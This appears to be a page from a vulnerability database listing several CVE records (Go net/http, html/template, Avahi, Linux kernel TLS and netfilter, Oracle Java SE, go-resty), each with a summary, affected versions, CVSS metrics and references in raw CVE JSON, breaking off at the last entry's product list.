A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Go standard library | net/http/internal |
Version: 0 ≤ Version: 1.21.0-0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:02:06.808Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/64433" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/547335" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-dev/c/6ypN5EjibjM/m/KmLVYH_uAgAJ" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2023-2382" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIU6HOGV6RRIKWM57LOXQA75BGZSIH6G/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "net/http/internal", "product": "net/http/internal", "programRoutines": [ { "name": "chunkedReader.beginChunk" }, { "name": "readChunkLine" }, { "name": "chunkedReader.Read" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.20.12", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.21.5", "status": "affected", "version": "1.21.0-0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Bartek Nowotarski" } ], "descriptions": [ { "lang": "en", "value": "A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-400: Uncontrolled Resource Consumption", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-12-06T16:27:53.832Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/64433" }, { "url": "https://go.dev/cl/547335" }, { "url": "https://groups.google.com/g/golang-dev/c/6ypN5EjibjM/m/KmLVYH_uAgAJ" }, { "url": "https://pkg.go.dev/vuln/GO-2023-2382" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIU6HOGV6RRIKWM57LOXQA75BGZSIH6G/" } ], "title": "Denial of service via chunk extensions in net/http" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2023-39326", "datePublished": "2023-12-06T16:27:53.832Z", "dateReserved": "2023-07-27T17:05:55.188Z", "dateUpdated": "2024-08-02T18:02:06.808Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38470
Vulnerability from cvelistv5
Published
2023-11-02 14:57
Modified
2024-08-29 14:21
Severity ?
EPSS score ?
Summary
A vulnerability was found in Avahi. A reachable assertion exists in the avahi_escape_label() function.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-38470 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2191690 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | n/a | avahi | |||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:39:13.623Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38470" }, { "name": "RHBZ#2191690", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191690" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38470", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T13:54:46.019977Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:21:01.506Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "avahi", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "avahi", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-04-26T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Avahi. A reachable assertion exists in the avahi_escape_label() function." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-617", "description": "Reachable Assertion", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-02T14:57:28.872Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38470" }, { "name": "RHBZ#2191690", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191690" } ], "timeline": [ { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Made public." } ], "title": "Reachable assertion in avahi_escape_label", "x_redhatCweChain": "CWE-617: Reachable Assertion" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-38470", "datePublished": "2023-11-02T14:57:28.872Z", "dateReserved": "2023-07-18T09:48:04.752Z", "dateUpdated": "2024-08-29T14:21:01.506Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-24785
Vulnerability from cvelistv5
Published
2024-03-05 22:22
Modified
2024-08-01 23:28
Severity ?
EPSS score ?
Summary
If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Go standard library | html/template |
Version: 0 ≤ Version: 1.22.0-0 ≤ |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-24785", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T18:49:44.784868Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:43:02.716Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T23:28:12.537Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/65697" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/564196" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2610" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240329-0008/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "html/template", "product": "html/template", "programRoutines": [ { "name": "jsValEscaper" }, { "name": "escaper.commit" }, { "name": "Template.Execute" }, { "name": "Template.ExecuteTemplate" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "RyotaK (https://ryotak.net)" } ], "descriptions": [ { "lang": "en", "value": "If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-05T22:22:33.640Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/65697" }, { "url": "https://go.dev/cl/564196" }, { "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2610" }, { "url": "https://security.netapp.com/advisory/ntap-20240329-0008/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "Errors returned from JSON marshaling may break template escaping in html/template" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2024-24785", "datePublished": "2024-03-05T22:22:33.640Z", "dateReserved": "2024-01-30T16:05:14.757Z", "dateUpdated": "2024-08-01T23:28:12.537Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26585
Vulnerability from cvelistv5
Published
2024-02-21 14:59
Modified
2024-12-19 08:42
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tls: fix race between tx work scheduling and socket close
Similarly to previous commit, the submitting thread (recvmsg/sendmsg)
may exit as soon as the async crypto handler calls complete().
Reorder scheduling the work before calling complete().
This seems more logical in the first place, as it's
the inverse order of what the submitting thread will do.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: a42055e8d2c30d4decfc13ce943d09c7b9dad221 Version: a42055e8d2c30d4decfc13ce943d09c7b9dad221 Version: a42055e8d2c30d4decfc13ce943d09c7b9dad221 Version: a42055e8d2c30d4decfc13ce943d09c7b9dad221 Version: a42055e8d2c30d4decfc13ce943d09c7b9dad221 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-26585", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-28T17:07:29.305466Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-28T17:07:36.266Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.712Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/196f198ca6fce04ba6ce262f5a0e4d567d7d219d" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "dd32621f19243f89ce830919496a5dcc2158aa33", "status": "affected", "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221", "versionType": "git" }, { "lessThan": "196f198ca6fce04ba6ce262f5a0e4d567d7d219d", "status": "affected", "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221", "versionType": "git" }, { "lessThan": "6db22d6c7a6dc914b12c0469b94eb639b6a8a146", "status": "affected", "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221", "versionType": "git" }, { "lessThan": "e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57", "status": "affected", "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221", "versionType": "git" }, { "lessThan": "e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb", "status": "affected", "version": "a42055e8d2c30d4decfc13ce943d09c7b9dad221", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/tls/tls_sw.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "4.20" }, { "lessThan": "4.20", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.165", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.84", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.18", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix race between tx work scheduling and socket close\n\nSimilarly to previous commit, the submitting thread (recvmsg/sendmsg)\nmay exit as soon as the async crypto handler calls complete().\nReorder scheduling the work before calling complete().\nThis seems more logical in the first place, as it\u0027s\nthe inverse order of what the submitting thread will do." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:42:59.385Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/dd32621f19243f89ce830919496a5dcc2158aa33" }, { "url": "https://git.kernel.org/stable/c/196f198ca6fce04ba6ce262f5a0e4d567d7d219d" }, { "url": "https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146" }, { "url": "https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57" }, { "url": "https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb" } ], "title": "tls: fix race between tx work scheduling and socket close", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26585", "datePublished": "2024-02-21T14:59:13.088Z", "dateReserved": "2024-02-19T14:20:24.125Z", "dateUpdated": "2024-12-19T08:42:59.385Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-21085
Vulnerability from cvelistv5
Published
2024-04-16 21:26
Modified
2024-11-05 16:44
Severity ?
EPSS score ?
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Oracle Corporation | Java SE JDK and JRE |
Version: Oracle Java SE:8u401 Version: Oracle Java SE:8u401-perf Version: Oracle Java SE:11.0.22 Version: Oracle GraalVM Enterprise Edition:20.3.13 Version: Oracle GraalVM Enterprise Edition:21.3.9 cpe:2.3:a:oracle:java_se:8u401:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:* cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:* |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-21085", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-13T20:35:49.870660Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-05T16:44:51.000Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T22:13:42.673Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "cpes": [ "cpe:2.3:a:oracle:java_se:8u401:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:*", "cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm:20.3.13:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:*" ], "product": "Java SE JDK and JRE", "vendor": "Oracle Corporation", "versions": [ { "status": "affected", "version": "Oracle Java SE:8u401" }, { "status": "affected", "version": "Oracle Java SE:8u401-perf" }, { "status": "affected", "version": "Oracle Java SE:11.0.22" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:20.3.13" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:21.3.9" } ] } ], "descriptions": [ { "lang": "en-US", "value": "Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Oracle Java SE: 8u401, 8u401-perf, 11.0.22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.", "lang": "en-US" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-16T21:26:27.090Z", "orgId": "43595867-4340-4103-b7a2-9a5208d29a85", "shortName": "oracle" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85", "assignerShortName": "oracle", "cveId": "CVE-2024-21085", "datePublished": "2024-04-16T21:26:27.090Z", "dateReserved": "2023-12-07T22:28:10.668Z", "dateUpdated": "2024-11-05T16:44:51.000Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52620
Vulnerability from cvelistv5
Published
2024-03-21 10:43
Modified
2024-12-19 08:22
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: disallow timeout for anonymous sets
Never used from userspace, disallow these parameters.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 2.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52620", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-26T20:33:31.634112Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-06T20:01:21.818Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:21.362Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/116b0e8e4673a5faa8a739a19b467010c4d3058c" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/49ce99ae43314d887153e07cec8bb6a647a19268" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/6f3ae02bbb62f151b19162d5fdc9fe3d48450323" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/00b19ee0dcc1aef06294471ab489bae26d94524e" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/b7be6c737a179a76901c872f6b4c1d00552d9a1b" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/e26d3009efda338f19016df4175f354a9bd0a4ab" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/netfilter/nf_tables_api.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "116b0e8e4673a5faa8a739a19b467010c4d3058c", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "49ce99ae43314d887153e07cec8bb6a647a19268", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "6f3ae02bbb62f151b19162d5fdc9fe3d48450323", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "00b19ee0dcc1aef06294471ab489bae26d94524e", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "b7be6c737a179a76901c872f6b4c1d00552d9a1b", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" }, { "lessThan": "e26d3009efda338f19016df4175f354a9bd0a4ab", "status": "affected", "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/netfilter/nf_tables_api.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "4.19.*", "status": "unaffected", "version": "4.19.312", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.274", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.215", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.151", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.81", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.4", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: disallow timeout for anonymous sets\n\nNever used from userspace, disallow these parameters." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:22:45.740Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/116b0e8e4673a5faa8a739a19b467010c4d3058c" }, { "url": "https://git.kernel.org/stable/c/49ce99ae43314d887153e07cec8bb6a647a19268" }, { "url": "https://git.kernel.org/stable/c/6f3ae02bbb62f151b19162d5fdc9fe3d48450323" }, { "url": "https://git.kernel.org/stable/c/00b19ee0dcc1aef06294471ab489bae26d94524e" }, { "url": "https://git.kernel.org/stable/c/b7be6c737a179a76901c872f6b4c1d00552d9a1b" }, { "url": "https://git.kernel.org/stable/c/e26d3009efda338f19016df4175f354a9bd0a4ab" } ], "title": "netfilter: nf_tables: disallow timeout for anonymous sets", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52620", "datePublished": "2024-03-21T10:43:42.854Z", "dateReserved": "2024-03-06T09:52:12.090Z", "dateUpdated": "2024-12-19T08:22:45.740Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45286
Vulnerability from cvelistv5
Published
2023-11-28 16:31
Modified
2024-08-28 20:01
Severity ?
EPSS score ?
Summary
A race condition in go-resty can result in HTTP request body disclosure across requests. This condition can be triggered by calling sync.Pool.Put with the same *bytes.Buffer more than once, when request retries are enabled and a retry occurs. The call to sync.Pool.Get will then return a bytes.Buffer that hasn't had bytes.Buffer.Reset called on it. This dirty buffer will contain the HTTP request body from an unrelated request, and go-resty will append the current HTTP request body to it, sending two bodies in one request. The sync.Pool in question is defined at package level scope, so a completely unrelated server could receive the request body.
References
Impacted products
